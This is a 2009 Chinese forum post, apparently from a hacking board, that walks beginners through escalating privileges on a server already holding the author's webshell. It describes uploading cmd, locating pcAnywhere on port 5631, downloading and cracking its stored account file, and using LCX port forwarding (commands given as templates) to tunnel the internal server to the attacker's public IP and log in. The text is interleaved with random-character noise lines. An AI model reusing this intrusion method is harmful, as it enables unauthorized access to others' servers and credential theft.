|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
2 x6 h5 N( J2 M# Q9 g. ^# n$ a1 k: m6 Z+ D8 A; b# j( o
提权方法:pcanywhere+LCX- ~. Q) {, M" I" r
7 B+ d' _! B: Y$ z8 M
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
; O) K* X- l0 F1 d# V" d. c; N0 `; ^2 k, z1 j8 u K
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。2 X& K( {7 b. o# z* \3 P" ~% H4 J
/ G5 N* g( @) Q ]1 R0 H" J! m
) Z* b- N1 i, c; F
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。# C( c; x0 y8 X ]% M s: W
- S f* ^1 S2 ?( T6 |$ ]
0 J$ o4 M, y) b8 H, R, z5 W
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。" Z$ F+ B3 ~; f; P6 }+ }7 e' i: c
& K s0 W( r* }
0 U7 k& R' a+ Z' u$ M2 | F7 M' @. j: }; \- c& [
# u5 v( u8 h+ J v8 V! a$ G& }+ V# F
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``7 j1 w: I+ q: t8 v
I. Y7 m8 H* f; B( i
! a! J" S% s" ]! tLCX的用法再简单说下:. @4 N$ n8 ]* n% s0 Q0 W. v
v7 T3 @5 J( o- B9 t; I
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
0 {8 F! ^$ r4 P6 L
$ {! b6 q2 d _6 }本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
- P& D& r1 D( E' z5 Q D' j' `5 O P C) J/ L; l4 {& m# T
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。' j. ~1 e; |: W
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``% y: l- t* V6 ~" \3 ~
: S8 K! j' R6 U4 e- `* M" w: R
! R- t. M3 N4 V5 S! Y, E8 w+ \) H# K# M% z5 _
2 n6 x- k2 x3 e# F' w S, `% I2 V呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。4 Q% f3 V6 U4 \$ }/ h4 H- Q
( e2 N+ [; V2 P) f+ ^
- \4 D' w- h Z5 G! `
& q7 {5 G5 b& c( N# P2 A" h1 v+ o2 R' v$ q, T
我们本地连接试试,输入我们刚破解的账号密码
1 [5 ?/ w* z) @+ v5 e; F3 u" K2 X }! j* ]* [' Q
9 p7 g- M1 V8 p6 b1 Y( h4 z- W, s
呵呵``连接成功,服务器不错,又一个8核^︵^
7 Z s' O5 R' L: M/ ]) x O; D( K. @, a- b
. y" s7 K# f: B. [7 B- m" h; X. J$ L
6 u' w8 @" W# H) O
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
